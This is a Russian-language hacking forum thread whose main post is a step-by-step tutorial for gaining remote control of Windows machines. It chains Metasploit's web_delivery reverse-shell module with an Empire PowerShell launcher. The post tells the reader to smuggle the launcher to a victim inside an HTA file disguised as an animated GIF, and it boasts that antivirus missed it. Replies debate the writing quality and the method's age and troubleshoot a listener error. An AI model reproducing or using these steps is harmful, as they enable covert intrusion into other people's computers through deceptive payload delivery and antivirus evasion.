• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Soft Empire-Metasploit — Хакаем виндовс по новому

Приветик! сегодня покажу как можно хацкнуть windows машину связав 2 инструмента - Empire, и Metasploit.
Я буду юзать машину с заранее установленным Metasploit, проще известный Кали. + Устанавливаем Empire.
Цель: мы будем получать метерпретер сессию используя Empire. Да, да может я поехал, но мне трудно юзать это... Раз в 12 легче юзать более понятный метерпретер. Ну и более скрытно.)

Приступим. Для начала установите Metasploit и Empire если у вас их нет.
EmpireProject/Empire (Empire)
Руководство по установке Metasploit для Linux (Metasploit)
Готово? Теперь открываем 2 окошка с терминалом. В первое пишем.
Код:
cd Empire
./empire
30969

Во 2-ом окошке пишем, если у вас не kali первую команду пропускайте.

Код:
service postgresql start
msfconsole
30970

В окне с msf пишем.

Код:
use exploit/multi/script/web_delivery
set SRVHOST (Ваш локальный ip)
set URIPATH help (В место help можно написать любое слово)
set lhost (Ваш локальный ip или публичный если атака идёт через сеть интернет)
set lport (Любое если идёт в локальной сети, или тот который пробросили)
set target 2 (Это лучше не изменять)
set payload windows/meterpreter/reverse_tcp
exploit -j или же exploit
Должно выглядеть примерно так.
30971

(Знайте если делаете атаку через сеть интернет
то обязательно пробросте порт 8080, а в параметре SRVHOST ваш локальный ip не в зависимости какая атака.)
Готово, теперь переходим к окну с empire, заранее скажу я хз как настроить там атаку через сеть интернет, я не нашёл нужные команды, как можно изменить свой lhost и lport? Отпишите в коменты.)
Пишем...
Код:
listeners
uselistener http
execute
listener http
launcher powershell http
Всё у нас есть повершел код и активный слушатель, за вами только доставить этот код на машину, рекомедую это делать с помошью вот этого кодика .


Всё жертва увидит танцы аниме тян, а вы agent в empire.
30972

В строке var payload=""; В кавычки вставляем наш повершел код и сохраняем как hta, можно закриптовать весь код, для большей скрытности, но у меня виндовс 7, 8, 10 не чего не засекли и так. А так же можно назвать наш файл gif и потом поменять, местами название и расширение.)
Продолжаем, теперь выбираем нашего агента.

Код:
agents
interact (Имя нашего агента)
30974


Терь скрываем это окошко идём в Metasploit
пишем exploit -j И получаем подобную ссылку " " Если атака через интернет сеть то пишите в места локального айпишника свой публичный. Так
30978

Переходим в первое окно, пишем.

Код:
usemodule code_execution/invoke_metasploitpayload
set URL (та ссылка которую вы получили)
execute
30982

Усо как видите мы получили метерпретер сессию, сябки за внимание :з

Вдохновитель -
Да, да слизал всё. Но однако же не нашёл этого в текстовом виде, и на русском языке. Решил как-то расписать, может кому помог.
 
Последнее редактирование:

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Прости... Но я что-то, совсем не понял твою мысль....
Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый
 

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый
Спасибо, постараюсь исправиться. )
 
  • Нравится
Реакции: legendofkiller

kravl

Green Team
19.08.2018
54
10
BIT
0
Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый
Покажи нам лучше и новее способ. Зачем сразу такие возражения ?) Парень хочет как-то проявить себя и показаться полезным форуму, а ты на него нападаешь.
 

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Покажи нам лучше и новее способ. Зачем сразу такие возражения ?) Парень хочет как-то проявить себя и показаться полезным форуму, а ты на него нападаешь.
Однако, он прав, тема старовата, но её почему-то не прописовали во время активного юзанья, ну а так ещё вроде профит, и встроенные ативари не кричат.)
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
И да, на будущее - ты пишешь статью, как бы заявляя, что ты имеешь компетенции в данном вопросе. Иными слова в твоей статье не должно быть фраз по типу «я хз почему так, но это так» ты должен досконально изучить вопрос прежде, чем писать, а вот почему так и так.
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Что-нибудь windwos defender говорил на десятке?
конечно скажет! все парни забудьте про реал-хек!))) качайте метасплойтбл и хекайте сами себя!))))

ПС дефедр лютутует! он уже не тот лоховской антик как был раньше...
 
  • Нравится
Реакции: DarkDepth и RinGinO

diagnostikapc

New member
04.11.2019
3
0
BIT
0
при ввводе команды execute выходит ошибка что не может открыть порт 80 и адрес уже занят. хотя данный порт не прослушивается больше никаким сервисом
Код:
(Empire: listeners/http) > execute
[*] Starting listener 'http1'
* Serving Flask app "http" (lazy loading)
* Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
* Debug mode: off
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Ensure the folder specified in CertPath exists and contains your pem and private key file.
[!] Listener failed to start!
 

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
при ввводе команды execute выходит ошибка что не может открыть порт 80 и адрес уже занят. хотя данный порт не прослушивается больше никаким сервисом
Код:
(Empire: listeners/http) > execute
[*] Starting listener 'http1'
* Serving Flask app "http" (lazy loading)
* Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
* Debug mode: off
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Ensure the folder specified in CertPath exists and contains your pem and private key file.
[!] Listener failed to start!
Хм... Через 20 - 30 минут, посмотрю что может быть.
Что у тебя за ОС?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!